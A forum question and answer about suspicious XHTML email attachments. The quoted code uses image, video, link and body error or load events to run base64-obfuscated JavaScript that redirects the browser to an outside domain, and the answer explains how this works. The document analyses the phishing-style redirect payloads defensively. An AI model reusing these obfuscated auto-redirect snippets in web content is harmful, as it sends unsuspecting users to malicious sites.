I receive emails with some xhtml files. I find these files to be suspicious. They contain JS code:
<video src="123" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));">
<img src="awbdsdrDYZZZCN33.jpg" onerror="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MzEyNjg4ODA3NjM3Mzc1NzEg');">
<body onload="document.location.replace(window.atob('aHR0cDovL3J1c25nLnByby80d1FKZEQ/NTU2MzQ2NzY1MzIwNjI1MSA='));" />
<link rel="stylesheet" type="text/css" href="1.css" onerror="document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NDg0NDUwNTc4NzAxMjMyIA=='));" />
<body onload="document.location.href=window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/MTE1MzQ1MDI0NTExMDQ2NzM0NCA=');" />
I am wondering how malicious this codes is. And what action do these files do with OS?
It redirects you to http://keitaro0001.pro/DcLtdS?7324243812487758.
It purposefully uses an incorrect src property to fire the error event (since the file at that source does not exist), executing the JS in the onerror attribute:
document.location.replace(window.atob('aHR0cDovL2tlaXRhcm8wMDAxLnByby9EY0x0ZFM/NzMyNDI0MzgxMjQ4Nzc1OCA='));
The string in question is base64 encoded. window.atob decodes the base64 encoded string (which is the URL above) and assigns it to the URL.